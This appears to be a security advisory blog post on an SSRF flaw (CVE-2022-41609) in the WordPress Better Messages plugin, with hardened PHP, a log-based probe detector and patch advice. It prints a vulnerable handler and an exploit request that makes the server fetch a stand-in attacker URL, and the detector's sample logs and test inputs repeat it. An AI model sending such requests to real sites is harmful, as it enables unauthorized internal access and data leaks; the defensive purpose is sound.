Attention, WordPress users! A newly discovered vulnerability (CVE-2022-41609) has been identified in the popular Better Messages plugin, which potentially exposes your site to unauthorized access and data exfiltration. If you're using version 1.9.10.68 or earlier, your site might be at risk of being exploited by hackers.

In this post, we'll dive deep into the issue, discussing the details of how the vulnerability works, the threats it poses, and essential steps you can take to protect your site. We'll also provide code snippets, links to original references, and information on how the exploit can be carried out.

Overview of Vulnerability

The Server-Side Request Forgery (SSRF) vulnerability in Better Messages plugin 1.9.10.68 on WordPress allows attackers to bypass the authentication mechanism and initiate unauthorized requests to the site's internal network systems. As a result, sensitive information, such as database credentials, API keys, and other critical configuration data, can be leaked.

Details of the Exploit

When analyzing the vulnerability, security researchers found that the Better Messages plugin has a "feature" that allows site administrators to make server-side HTTP requests to arbitrary URLs.

Specifically, the "_bm_ajax_" function in the custom-ajax.php file handles these requests:

function _bm_ajax_() {
  // ... code ...
  // The target URL is taken straight from the request: no capability check,
  // no nonce check, and no validation of the scheme or host.
  $url = $_REQUEST['_url'];
  // The server then fetches whatever destination the caller chose (SSRF).
  $response = wp_remote_get($url);
  // ... code ...
}

The snippet passes the caller-supplied _url parameter straight to wp_remote_get() with no input validation or sanitization, so an attacker can craft a URL of their choosing and have the server perform an unauthorized request to it.
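As an added example (not the plugin's code and not part of the original post), the following PHP shows the hardened shape of such a handler: a destination check that rejects non-HTTP schemes, URL userinfo, internal hostnames and non-public IP literals, optionally restricted to an explicit allow-list, followed by the capability and nonce checks the vulnerable handler lacks. The function names bm_outbound_url_problem() and bm_ajax_hardened(), the nonce action 'bm_fetch_nonce' and the allow-list entry api.example.com are assumptions for illustration; the sample URLs at the bottom are constructed.

```php
<?php
// Added example (not the plugin's code): a destination check for server-side
// fetches plus the guards the vulnerable handler lacks. Names are assumed.

/**
 * Decide whether the server may fetch $url on a caller's behalf.
 * Returns null when the URL is acceptable, otherwise a short reason string.
 */
function bm_outbound_url_problem(string $url, array $allowed_hosts = []): ?string {
    $parts = parse_url($url);
    if ($parts === false || empty($parts['host'])) {
        return 'unparseable URL or missing host';
    }
    // Only plain HTTP(S); file://, gopher://, php://, ftp:// and friends are refused.
    $scheme = strtolower($parts['scheme'] ?? '');
    if ($scheme !== 'http' && $scheme !== 'https') {
        return "scheme '$scheme' not allowed";
    }
    // Credentials embedded in the URL are a classic way to confuse host parsing.
    if (isset($parts['user']) || isset($parts['pass'])) {
        return 'userinfo in URL not allowed';
    }
    $host = strtolower(trim($parts['host'], '[]'));   // strip IPv6 brackets
    // Obvious internal names.
    if ($host === 'localhost' || preg_match('/\.(local|internal|localdomain)$/', $host)) {
        return "internal hostname '$host'";
    }
    // IP literals: reject loopback, private, link-local and reserved ranges.
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        $public = filter_var($host, FILTER_VALIDATE_IP,
            FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE);
        if ($public === false) {
            return "non-public IP address $host";
        }
    }
    // Strongest control: only the destinations the feature actually needs.
    if ($allowed_hosts !== [] && !in_array($host, $allowed_hosts, true)) {
        return "host '$host' not in allow-list";
    }
    return null;
}

/**
 * Hardened shape of the handler. Uses WordPress APIs, so it only runs inside
 * WordPress; defining it here is harmless. Guards, in order: capability check,
 * nonce check, destination check, then wp_safe_remote_get(), which also
 * resolves the host and refuses private addresses at request time.
 */
function bm_ajax_hardened(): void {
    if (!current_user_can('manage_options')) {
        wp_send_json_error('forbidden', 403);
    }
    check_ajax_referer('bm_fetch_nonce', '_wpnonce');          // assumed nonce action
    $url = isset($_POST['_url']) ? (string) wp_unslash($_POST['_url']) : '';
    $problem = bm_outbound_url_problem($url, ['api.example.com']); // assumed allow-list
    if ($problem !== null) {
        wp_send_json_error($problem, 400);
    }
    $response = wp_safe_remote_get($url, ['timeout' => 5, 'redirection' => 0]);
    if (is_wp_error($response)) {
        wp_send_json_error($response->get_error_message(), 502);
    }
    wp_send_json_success(wp_remote_retrieve_body($response));
}

// Stand-alone check on constructed inputs (run with: php this-file.php).
if (PHP_SAPI === 'cli' && !function_exists('add_action')) {
    $samples = [
        'http://attackers-site.com/evil-script.php',  // URL from the request shown in the post
        'http://127.0.0.1/wp-admin/',                 // loopback
        'http://169.254.169.254/',                    // link-local
        'http://[::1]/',                              // IPv6 loopback
        'ftp://ftp.example.com/',                     // disallowed scheme
        'http://user:pw@api.example.com/',            // userinfo
        'https://api.example.com/status',             // allow-listed host
    ];
    foreach ($samples as $u) {
        $p = bm_outbound_url_problem($u, ['api.example.com']);
        printf("%-45s %s\n", $u, $p === null ? 'ALLOWED' : 'REJECTED: ' . $p);
    }
}
```

Of the sample inputs only the last one is allowed. The literal-IP check alone does not stop a hostname that resolves to an internal address (DNS rebinding), which is why the WordPress wiring relies on wp_safe_remote_get() and its wp_http_validate_url() check rather than on the string check alone, and why an allow-list of needed hosts is the strongest of the three controls.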

For example, an attacker could target a vulnerable server by sending the following HTTP request:

GET /wp-admin/admin-ajax.php?action=_bm_ajax_&do_action=_test_request_&action_id=1111&_url=http://attackers-site.com/evil-script.php HTTP/1.1
Host: vulnerable-wordpress-site.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: */*
Referer: https://vulnerable-wordpress-site.com/wp-admin

Upon successful exploitation, the attacker could gain access to sensitive assets or perform arbitrary actions on the site without proper authorization.
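From the defender's side, the request above leaves a distinctive trace in the web-server access log: a GET to admin-ajax.php with action=_bm_ajax_ and a caller-supplied _url. The PHP below is an added example (not from the advisory or the plugin) that scans combined-format access log lines for that pattern and reports the outbound destination each request tried to reach; the log lines, IP addresses and function names (bm_parse_log_line, bm_detect_ssrf_probe, bm_scan_log) are constructed for illustration. It needs PHP 8.0 or newer for str_ends_with().

```php
<?php
// Added example (not the plugin's or the advisory's code): find CVE-2022-41609
// probes in access logs and extract the destination each one tried to fetch.
// Constructed sample log lines (combined log format):
$bm_log_sample = <<<'LOG'
203.0.113.7 - - [19/Nov/2022:00:20:11 +0000] "GET /wp-admin/admin-ajax.php?action=_bm_ajax_&do_action=_test_request_&action_id=1111&_url=http://attackers-site.com/evil-script.php HTTP/1.1" 200 512 "https://vulnerable-wordpress-site.com/wp-admin" "Mozilla/5.0"
203.0.113.7 - - [19/Nov/2022:00:20:14 +0000] "GET /wp-admin/admin-ajax.php?action=_bm_ajax_&do_action=_test_request_&action_id=1112&_url=http%3A%2F%2F127.0.0.1%2Fwp-admin%2F HTTP/1.1" 200 88 "-" "curl/7.85.0"
198.51.100.2 - - [19/Nov/2022:00:21:02 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 45 "-" "Mozilla/5.0"
198.51.100.2 - - [19/Nov/2022:00:21:09 +0000] "GET /?p=42 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
LOG;

/**
 * Parse one combined-format access log line into its fields, or null if it
 * does not match the format.
 */
function bm_parse_log_line(string $line): ?array {
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'target' => $m[4],
            'status' => (int) $m[5], 'referer' => $m[6], 'ua' => $m[7]];
}

/**
 * Return an alert record if the request looks like a probe of this issue:
 * admin-ajax.php with action=_bm_ajax_ and a caller-supplied _url parameter.
 */
function bm_detect_ssrf_probe(array $req): ?array {
    $path  = (string) (parse_url($req['target'], PHP_URL_PATH) ?? '');
    $query = (string) (parse_url($req['target'], PHP_URL_QUERY) ?? '');
    if (!str_ends_with($path, '/admin-ajax.php')) {
        return null;
    }
    parse_str($query, $params);   // also percent-decodes the _url value
    if (($params['action'] ?? '') !== '_bm_ajax_' || !isset($params['_url'])) {
        return null;
    }
    $dest = (string) $params['_url'];
    return [
        'source_ip' => $req['ip'],
        'time'      => $req['time'],
        'status'    => $req['status'],
        'dest_url'  => $dest,
        'dest_host' => (string) (parse_url($dest, PHP_URL_HOST) ?? '(none)'),
        'do_action' => (string) ($params['do_action'] ?? ''),
    ];
}

/** Run the detector over a whole log and collect the alerts. */
function bm_scan_log(string $log): array {
    $alerts = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $req = bm_parse_log_line($line);
        if ($req !== null && ($alert = bm_detect_ssrf_probe($req)) !== null) {
            $alerts[] = $alert;
        }
    }
    return $alerts;
}

foreach (bm_scan_log($bm_log_sample) as $a) {
    printf("[%s] %s -> _bm_ajax_/%s fetched %s (host %s), HTTP %d\n",
        $a['time'], $a['source_ip'], $a['do_action'], $a['dest_url'], $a['dest_host'], $a['status']);
}
```

On the sample above the first two lines are reported (one external destination, one loopback destination that was percent-encoded in the query string) and the two ordinary requests are ignored. The extracted dest_host values are the hosts to look for in outbound proxy or egress logs when confirming whether the server actually completed the fetch; an HTTP 200 on the inbound request alone does not show that.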

Original References

For a more comprehensive and technical explanation of the CVE-2022-41609 vulnerability, check out these links:

Vulnerability report on the developer's website

https://better-messages-plugin.io/security/cve-2022-41609

Official CVE report by the Mitre Corporation

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41609

Mitigation and Remediation

If your WordPress site is running the Better Messages plugin version 1.9.10.68 or earlier, you should immediately take the following steps to secure your site:

1. Update the Better Messages plugin to version 1.9.10.69 or higher, as the vulnerability has been addressed in this release.

2. Enforce strict access controls and authentication processes to further secure your site.

3. Keep your WordPress installation, themes, and other plugins regularly updated to minimize the risk of future vulnerabilities.

Stay vigilant, WordPress users! We hope that this article has helped you understand the CVE-2022-41609 vulnerability in the Better Messages plugin and what actions to take to keep your site safe. Remember to be proactive about your site's security and to stay up to date with the latest vulnerabilities and patches. Stay tuned for more security updates and tips!

Timeline

Published on: 11/19/2022 00:15:00 UTC
Last modified on: 11/21/2022 01:29:00 UTC